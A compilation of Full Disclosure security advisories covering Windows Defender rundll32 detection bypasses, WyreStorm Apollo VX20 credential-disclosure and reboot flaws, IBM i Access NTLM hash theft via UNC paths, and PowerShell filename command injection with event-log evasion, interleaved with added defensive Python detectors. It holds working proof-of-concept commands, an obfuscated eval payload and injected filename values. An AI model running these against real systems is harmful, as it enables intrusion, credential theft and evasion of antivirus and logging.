[FD] Microsoft Windows Defender / Backdoor:JS/Relvelshe.A / Detection Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Detection Mitigation Bypass
Backdoor:JS/Relvelshe.A

[CVE Reference]
N/A

[Security Issue]
Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in Defender, but it no longer works because it was mitigated. However, wrapping the same payload in a JavaScript try/catch statement and eval'ing the hex-decoded string executes as of the time of this post. (The hex string below decodes to new ActiveXObject("WScript.Shell").Run("calc.exe").)

[References]
https://twitter.com/hyp3rlinx/status/1480657623947091968

[Exploit/POC]
1) python -m http.server 80
2) Open command prompt as Administrator
3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+" http://localhost/yo.tmp";)

Create the file "yo.tmp" and host it on the server. Contents of "yo.tmp":

try{
<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
    str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
}catch(e){
eval(str)
}

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification:
February 18, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / VBScript Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Windows Defender VBScript Detection Mitigation Bypass
Trojan:Win32/Powessere.G

[CVE Reference]
N/A

[Security Issue]
Typically, Windows Defender detects and prevents Trojan:Win32/Powessere.G aka "POWELIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Previously I disclosed three bypasses using rundll32 javascript; this example leverages VBScript and the ActiveX engine.

Running

rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

will typically get blocked by Windows Defender with an "Access is denied" message:

Trojan:Win32/Powessere.G
Category: Trojan
This program is dangerous and executes commands from an attacker.

However, the second "mshtml" path component can be replaced with arbitrary text, building on my previous JavaScript based bypasses, to skirt Defender detection. For example, substituting "shtml", "Lol" or other text, and it executes as of the time of this writing. E.g.

C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)

[References]
https://twitter.com/hyp3rlinx/status/1759260962761150468
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
https://lolbas-project.github.io/lolbas/Binaries/Rundll32/

[Exploit/POC]
C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
Access is denied.

C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)
We win!

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification:
February 18, 2024 : Public Disclosure
[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 3
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
Trojan:Win32/Powessere.G

[CVE Reference]
N/A

[Security Issue]
Typically, Windows Defender detects and prevents Trojan:Win32/Powessere.G aka "POWELIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message.

Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml, but that has since been mitigated. Recently, on Feb 7, 2024, I disclosed that a doubled comma ",," bypasses that mitigation, but that has since been fixed again. The fix was short lived, as I found yet another trivial bypass soon after: referencing mshtml twice, each reference behind its own path traversal, as the PoC below shows.

[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')

[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg

[Network Access]
Local

[Severity]
High

[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601

[Disclosure Timeline]
Vendor Notification:
February 16, 2024 : Public Disclosure
[FD] Microsoft Windows Defender / Trojan.Win32/Powessere.G / Detection Mitigation Bypass Part 2.
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
Trojan:Win32/Powessere.G

[CVE Reference]
N/A

[Security Issue]
Trojan:Win32/Powessere.G / Mitigation Bypass Part 2.

Typically, Windows Defender detects and prevents Trojan:Win32/Powessere.G aka "POWELIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml, but that has since been mitigated. However, I discovered that doubling the comma ",," before RunHTMLApplication bypasses that mitigation and successfully executes as of the time of this writing.

[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt

[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
Access is denied.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
Multi-commas, for the Win!

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
February 7, 2024 : Public Disclosure
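The four Defender bypasses in the posts above (extra path traversal, doubled comma, a second mshtml reference, an arbitrary path component with VBScript) keep the same three ingredients: rundll32 handed a javascript: or vbscript: URL, a fake "DLL path" that only has to resolve to mshtml, and RunHTMLApplication named as the export. The Python below is an added example written for this page, not code from the advisories. It classifies process command lines on that invariant rather than on any one variant's spelling, and pulls out the traversal depth, filler tokens and the script payload for triage. The sample command lines are constructed (the PoC lines from the posts above plus two ordinary rundll32 uses); in practice you would feed it the CommandLine field of Sysmon Event 1 or Security 4688 records.

```python
import re

# Constructed sample command lines (not captured from a real host). The first
# five are the bypass variants shown in these advisories; the last two are
# ordinary rundll32 invocations that must not be flagged.
SAMPLE_COMMAND_LINES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)',
    r'rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)',
    r"""rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')""",
    r'rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)',
    r'rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+" http://localhost/yo.tmp";)',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    r'rundll32.exe "C:\Windows\System32\mshtml.dll",PrintHTML "C:\report.html"',
]

# The invariant every variant shares: rundll32 is handed a script: URL, the
# "DLL path" only has to resolve to mshtml, and RunHTMLApplication is the
# export. Traversal depth, doubled commas and junk path components are loader
# noise, so the match must not depend on them.
RUNDLL32 = re.compile(r'(?:^|[\\/\s"])rundll32(?:\.exe)?\b', re.IGNORECASE)
SCRIPT_URL = re.compile(r'\b(javascript|vbscript):', re.IGNORECASE)
MSHTML_RUNHTA = re.compile(r'mshtml\b.*?RunHTMLApplication', re.IGNORECASE | re.DOTALL)


def classify(cmdline):
    """Return a dict describing a rundll32 script-URL launch, or None."""
    if not RUNDLL32.search(cmdline):
        return None
    url = SCRIPT_URL.search(cmdline)
    if not url:
        return None
    tail = cmdline[url.end():]
    if not MSHTML_RUNHTA.search(tail):
        return None
    # The quoted part after javascript:/vbscript: is the fake DLL path plus
    # export; whatever follows the closing quote is the script that runs.
    close = tail.find('"', 1) if tail.startswith('"') else -1
    fake_path = tail[1:close] if close > 0 else tail
    payload = tail[close + 1:] if close > 0 else ""
    components = [c for c in re.split(r'\\+|/', fake_path) if c]
    return {
        "engine": url.group(1).lower(),
        "traversal_depth": components.count(".."),
        "multi_comma": ",," in fake_path,
        # Anything that is neither ".." nor mshtml is filler the loader ignores
        # (the "LoL"/"PWN" trick from the VBScript post).
        "odd_tokens": [c for c in components
                       if c != ".." and not c.lower().startswith("mshtml")],
        # Stage-two fetch: GetObject() plus a URL, even when "script:" is built
        # by string concatenation so a literal "script:" signature never fires.
        "remote_fetch": bool(re.search(r'GetObject\s*\(', payload, re.I)
                             and re.search(r'https?://', payload, re.I)),
        "payload": payload.strip(),
    }


def scan(lines):
    """Classify every line; return only the hits, in input order."""
    hits = []
    for line in lines:
        hit = classify(line)
        if hit is not None:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(hit)
```

Matching on the command line alone is the weak point: rundll32 can be renamed or launched through a copy, so pair this with the image path and the parent process from the same event, and treat any script: URL given to rundll32 as worth a look even when the mshtml/RunHTMLApplication pair is absent.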
[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - Credentials Disclosure / CVE-2024-25735
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.wyrestorm.com

[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)

[Affected Component]
Web interface, config

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[CVE Reference]
CVE-2024-25735

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) router by sending an unauthenticated HTTP GET request for /device/config. The credentials are returned in the HTTP response.

curl -k https://192.168.x.x/device/config

E.g. HTTP response snippet:

:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"},"softAp":{"password":"12345678","router":"y","softAp":"y"}...

[Exploit/POC]
import requests

target = "https://x.x.x.x"

# The device uses a self-signed certificate, hence verify=False (curl -k above).
res = requests.get(target + "/device/config", verify=False)
body = res.text
idx = body.find('{"password":')
if idx != -1:
    # look for "router" only after the password key so an earlier match cannot cut the slice short
    idx2 = body.find('router', idx)
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + body[idx + 1:idx2 + 11])
        print("[+] hyp3rlinx")
else:
    print("[!] Apollo VX20 Device not vulnerable...")

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[FD] Wyrestorm Apollo VX20 / Account Enumeration / CVE-2024-25734
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.wyrestorm.com

[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Account Enumeration

[CVE Reference]
CVE-2024-25734

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered; an invalid username is simply prompted for again. Attackers who can reach the Apollo VX20 Telnet service can therefore determine valid accounts, which can potentially allow a brute force attack on a valid account.

[Exploit/POC]
telnet x.x.x.x 23
username:aa
username:bb
username:admin
password:

[Network Access]
Remote

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[FD] Wyrestorm Apollo VX20 / Incorrect Access Control - DoS / CVE-2024-25736
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.wyrestorm.com

[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Incorrect Access Control (DoS)

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[Affected Component]
Web interface, reboot and reset commands

[CVE Reference]
CVE-2024-25736

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via an unauthenticated /device/reboot HTTP GET request.

[Exploit/POC]
curl -k https://192.168.x.x/device/reboot

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure
[FD] IBM i Access Client Solutions / Remote Credential Theft / CVE-2024-22318
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.ibm.com

[Product]
IBM i Access Client Solutions

[Versions]
All

[Remediation/Fixes]
None

[Vulnerability Type]
Remote Credential Theft

[CVE Reference]
CVE-2024-22318

[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. Attackers can place UNC paths inside ACS 5250 display terminal configuration files (".HOD", or the legacy ".WS") that point to a hostile server. If NTLM is enabled and the user opens the attacker-supplied file, the Windows operating system will try to authenticate to that server using the current user's session. The attacker-controlled server can then capture the NTLM hash information to obtain the user's credentials.

[References]
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]
The client access .HOD file vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

2) [KeyRemapFile]
   Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, use Kali Linux Responder.py to capture the authentication attempt:

Responder.py -I eth0 -A -vv

The client access legacy .WS file vulnerable parameter:

DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file:

[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure
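Because the bug is triggered by opening a profile, the defensive check belongs on the file before anyone opens it. The Python below is an added example for this page, not IBM's or the advisory's code: it walks .WS/.HOD profiles with a lenient INI-style reader (keys before the first [section] are kept under an empty section name, which covers the .HOD screenHistoryArchiveLocation case), flags every value that begins with a UNC path, records which host the workstation would authenticate to, and marks the three parameters this advisory names. The sample profiles are constructed; ATTACKER-SERVER is the placeholder host from the advisory, and the allow-list in safe_to_open() is an assumption about how a site would whitelist its own file servers.

```python
import re

# Constructed session profiles (not real vendor files). SAMPLE_WS follows the
# legacy .WS example in the advisory; SAMPLE_HOD uses the two .HOD parameters
# the advisory names; SAMPLE_CLEAN points at a local path and must pass.
SAMPLE_WS = r"""[Profile]
ID=WS
Version=9
[Telnet5250]
HostName=PWN
Security=CA400
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250
"""

SAMPLE_HOD = r"""# constructed 5250 session profile
hostName=PWN
screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c
[KeyRemapFile]
Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c
"""

SAMPLE_CLEAN = r"""[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=C:\ACS\profiles\custom.kmp
"""

# \\host followed by a separator or end of value; the host is captured.
UNC_PREFIX = re.compile(r'^\\\\([^\\/\s]+)')

# The three parameters the advisory reports as abused. Matched by key name so
# the check still fires if a key turns up under a different section header.
KNOWN_VECTORS = {"screenhistoryarchivelocation", "filename", "defaultkeyboard"}


def parse_profile(text):
    """Yield (section, key, value) triples from INI-style .WS/.HOD text.
    Keys that precede any [section] header are reported with section ''."""
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            yield section, key.strip(), value.strip()


def find_unc_references(text):
    """Every value that starts with a UNC path, plus the host it would authenticate to."""
    findings = []
    for section, key, value in parse_profile(text):
        m = UNC_PREFIX.match(value)
        if m:
            findings.append({
                "section": section,
                "key": key,
                "host": m.group(1),
                "known_vector": key.lower() in KNOWN_VECTORS,
            })
    return findings


def safe_to_open(text, trusted_hosts=()):
    """True when no value points at a UNC host outside the allow-list
    (assumed site policy: only named internal file servers are acceptable)."""
    trusted = {h.lower() for h in trusted_hosts}
    return all(f["host"].lower() in trusted for f in find_unc_references(text))


if __name__ == "__main__":
    import pathlib
    import sys
    root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path in root.rglob("*"):
        if path.suffix.lower() in (".ws", ".hod"):
            for f in find_unc_references(path.read_text(errors="replace")):
                flag = "KNOWN" if f["known_vector"] else "other"
                print("%s: [%s] %s -> \\\\%s (%s)" % (path, f["section"], f["key"], f["host"], flag))
```

Any UNC value is reported, not just the three known keys, because the advisory shows the client resolving file-type parameters generically; the known_vector flag only tells you which findings match the published vector. Run it over mail attachments or a download directory before the profile reaches ACS, and treat an unknown host as a reason not to open the file.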
[FD] RansomLord v2 - Anti-Ransomware Exploitation Tool / New Release
RansomLord v2 - Anti-Ransomware Exploitation Tool

[Description]
RansomLord is a proof-of-concept anti-ransomware exploitation tool that generates PE files used to exploit vulnerable ransomware pre-encryption.

Lang: C
SHA256: 8EA83752C4096C778709C14B60B9735CC68A5971DCDB0028A0BB167550554769

This version now intercepts and terminates malware tested from 43 different threat groups, adding Wagner, Hakbit, Paradise, Jaff, DoubleZero, Blacksnake, Darkbit, Vohuk, Medusa and Phobos. Two of them, Wagner and DoubleZero, are wipers supposedly used against entities in the Ukraine conflict.

Updated the x32/x64 DLLs to exploit ten more vulnerable ransomware families.
Added the -s Security information flag section.

Some security engines may incorrectly flag RansomLord DLLs as malicious. They are NOT: the Win32 API export functions are stubs that simply call exit(1).

Generated exploit DLL MD5 file hashes:
x32: DFFBE7F79077E89197334764FE6882F4
x64: 5B54E12B8B944FDF64C091B0E6588E48

[Download]
https://github.com/malvuln/RansomLord/releases/tag/v2

Malvuln
[FD] Windows PowerShell Single Quote Code Execution / Event Log Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] twitter.com/malvuln
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Windows PowerShell

Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass

[CVE Reference]
N/A

[Security Issue]
In the past I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on my "PSTrojanFile" work, adding a PowerShell command line single quote bypass and a PowerShell event logging failure.

On the Windows command line, tab-completing a filename wraps it in double quotes, which can be leveraged to trigger arbitrary code execution. However, if the filename is wrapped in single quotes the trick failed, until now.

[Single Quote Code Exec Bypass]
Combining the semicolon ";" and ampersand "&" characters bypasses the single quote limitation, given a malicious filename. The trailing semicolon ";" delimits the .XML extension and helps trigger the PE file specified, in this case DOOM.exe, and the PowerShell event log entry gets truncated.

Take the following three test cases using the Defender API, which takes a specially crafted filename.

C:\>powershell Set-ProcessMitigation -PolicyFilePath "Test;saps DOOM;.xml"

1) Double quotes OK      "Test;saps DOOM;.xml"
2) Single quotes FAILS   'Test;saps DOOM;.xml'
3) Single quotes BYPASS  'Test&DOOM;.xml'

Prefixing the "powershell" command to the PowerShell API call is a requirement, and this may affect many built-in PowerShell API or module commands.

C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in the Downloads dir. Notice how we only need a partial name as part of the .ZIP archive filename we are scanning here, and that it also excludes the .EXE portion of that filename.

[PS Event Log Bypass]
On Windows, PowerShell event logging can be enabled to alert a SOC on suspicious activity and/or for incident response forensic artifact purposes. However, when bypassing PowerShell single quotes I noticed an interesting side effect: the ampersand "&" character seems to truncate the PowerShell event log entry. For example, processing 'Infected&Malware;.zip', Event ID 403 logs 'Infected' and not the true name of 'Malware.exe', which was actually executed.

Want to mask the true name of the file from PowerShell event logging? (Malware.exe lives in the same directory.)

C:\>powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5

Below, the event log HostApplication contains 'Infected' and not the true name of Malware.exe that was actually executed, due to truncation.

[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=25
HostName=ConsoleHost
HostVersion=5.1.19041.1682
HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0
HostApplication=powershell get-filehash 'Infected
EngineVersion=5.1.19041.1682

[Exploit/POC]
powershell Get-Filehash 'Infected&Malware;.zip' -algorithm MD5

Run some malware plus bypass logging of the true file name:

C:\Users\gg\Downloads>powershell get-filehash 'Infected&Malware;.zip' -algorithm md5

PE file Malware.exe is in the Downloads directory; notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:

powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call the ping cmd using a double "&":

C:\>powershell Get-Filehash 'powerfail&ping 8.8.8.8&.txt' -algorithm md5

Call a Windows cmd to log off the victim:

C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:
A) to call commands, use a double "&" --> 'virus&logoff&test.zip'
B) to bypass PS event logging of the true file name and execute code, use "&" with ";" --> 'Infected&Malware;.zip'

[References]
https://github.com/hyp3rlinx/PSTrojanFile
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023 : Public Disclosure
[FD] Microsoft Defender Anti-Malware PowerShell API - Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] x.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows PowerShell

[Vulnerability Type]
Arbitrary Code Execution

[CVE Reference]
N/A

[Security Issue]
Microsoft Defender Anti-Malware and/or PowerShell APIs can end up executing arbitrary code. E.g. scanning a directory, a shortcut .lnk or even a non-existent item may execute unintended code. This vector builds upon my previous advisory and the subsequent PSTrojanFile project.

Requirements:
1) On the command line the 'powershell' cmd is prefixed, or PowerShell is called from another script with the argument passed in
2) An executable file with the same name as the parameter lives nearby

Examples:

powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads\;saps Helper;.1.zip"
(Helper.exe lives on the Desktop)

Create the directory ";saps Test"; Test.exe, Test.cmd etc. is on the same CL path:
powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"

Create a directory with a semicolon, drop a PE file named doom.exe in the same path:
powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom"

TODO: Update PSTrojanFile

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
https://github.com/hyp3rlinx/PSTrojanFile
https://www.exploit-db.com/exploits/47248
https://github.com/MicrosoftDocs/windows-powershell-docs/tree/main/docset/winserver2019-ps/defender

[Video PoC URL]
https://www.youtube.com/watch?v=0Go6yJiRWP8

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: circa 2019
December 7, 2023 : Public Disclosure
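The two PowerShell posts above (the single-quote / Event ID 403 bypass, and the Defender API filename execution) share one root: a file or directory name is spliced onto a "powershell <cmdlet> <name>" line, and ";" and "&" inside the name become PowerShell syntax. The Python below is an added example for this page, not the author's PSTrojanFile code. It does two things a defender wants: hunt for names with that shape (";" followed by something command-like, or "&" followed by a bare word, which is the call operator), and check an Event 403 HostApplication value for the truncation the posts describe, reconciling it against the full command line from the process-creation event. The file names and log fields are constructed from the examples above; correlating HostApplication with a Security 4688 or Sysmon Event 1 record by PID and time is an assumption about the telemetry available.

```python
import re

# Constructed file names (not taken from a real system). The first five are the
# shapes used in these advisories; the rest are ordinary names that should pass.
SAMPLE_NAMES = [
    "Test;saps DOOM;.xml",
    "Test&DOOM;.xml",
    "Infected&Malware;.zip",
    "powerfail&ping 8.8.8.8&.txt",
    "virus&logoff&test.zip",
    "quarterly report;final.xlsx",
    "Report (Q3).xlsx",
    "notes.txt",
]

# Constructed Event 403 HostApplication field (shape from the advisory) and the
# full command line a process-creation event would hold for the same launch.
SAMPLE_HOST_APPLICATION = "powershell get-filehash 'Infected"
SAMPLE_PROCESS_CMDLINE = "powershell get-filehash 'Infected&Malware;.zip' -algorithm md5"

# Tokens that run as a command when they land after ';' on a PowerShell line:
# Verb-Noun cmdlets, the aliases and executables used in these advisories, and
# anything with a runnable extension. Extend the list for your environment.
COMMAND_LIKE = re.compile(
    r'^(?:[A-Za-z]+-[A-Za-z]+|saps|start|iex|icm|cmd|ping|logoff|powershell|rundll32'
    r'|[\w.-]+\.(?:exe|cmd|bat|ps1))$', re.IGNORECASE)


def classify_filename(name):
    """Reasons a file name would be parsed as PowerShell code when spliced onto
    a 'powershell <cmdlet> <name>' command line; empty list means it looks inert."""
    reasons = []
    # '&' is PowerShell's call operator: the bare word after it gets invoked.
    for m in re.finditer(r'&\s*([A-Za-z_][^\s&;]*)', name):
        reasons.append("call operator invokes %r" % m.group(1))
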